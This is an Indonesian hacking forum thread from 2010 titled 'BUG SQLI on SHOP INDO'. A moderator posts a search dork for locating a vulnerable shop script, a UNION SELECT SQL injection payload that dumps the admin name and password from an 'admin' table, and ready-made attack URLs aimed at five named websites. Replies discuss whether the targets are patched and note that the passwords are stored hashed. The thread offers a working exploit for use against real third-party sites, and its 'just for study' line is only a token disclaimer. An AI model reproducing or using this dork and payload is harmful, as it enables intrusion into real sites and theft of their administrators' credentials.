zee_00n Global Moderator
Jumlah posting : 498 Join date : 2009-11-15 Age : 31 Lokasi : Antara NeRaka dan SurGa
| Subject: BUG SQLI on SHOP INDO Sat Jan 23, 2010 11:42 pm | |
| dork : inurl: "news=ya&bid=" inject : - Code:
-
+union+select+all+null,null,null,concat(nama_admin,char(58),pass_admin),null+from+admin-- contoh - Code:
-
http://www.monica-shop.com/?news=ya&bid=-10+union+select+all+null,null,null,concat%28nama_admin,char%2858%29,pass_admin%29,null+from+admin--
http://www.butikjogja.com/?news=ya&bid=-15+union+select+all+null,null,null,concat%28nama_admin,char%2858%29,pass_admin%29,null+from+admin--
http://ayoomembaca.com/?news=ya&bid=-13+union+select+all+null,null,null,concat%28nama_admin,char%2858%29,pass_admin%29,null+from+admin--
http://ayoomembaca.com/?news=ya&bid=-13+union+select+all+null,null,null,concat%28nama_admin,char%2858%29,pass_admin%29,null+from+admin--
http://www.dharmahealthcare.com/?news=ya&bid=-113+union+select+all+null,null,null,concat%28nama_admin,char%2858%29,pass_admin%29,null+from+admin-- FOR the WOMAN in my heart ^_^ Don't Destroy INDONESIAN WEB just for STUDY ^_^ | |
|
z3r0x Global Moderator
Jumlah posting : 220 Join date : 2009-11-20 Age : 34 Lokasi : Cyber World
| Subject: Re: BUG SQLI on SHOP INDO Sat Feb 06, 2010 7:42 pm | |
| - Code:
-
http://www.dharmahealthcare.com/?news=ya&bid=-113+union+select+all+null,null,null,concat%28nama_admin,char%2858%29,pass_admin%29,null+from+admin--
kyaknya dah di patc! | |
|
zee_00n Global Moderator
Jumlah posting : 498 Join date : 2009-11-15 Age : 31 Lokasi : Antara NeRaka dan SurGa
| Subject: Re: BUG SQLI on SHOP INDO Mon Feb 08, 2010 10:20 pm | |
| masig bisa tuh.. cumag passwordnya di encrypt ama adminya.. | |
|
Sponsored content
| Subject: Re: BUG SQLI on SHOP INDO | |
| |
|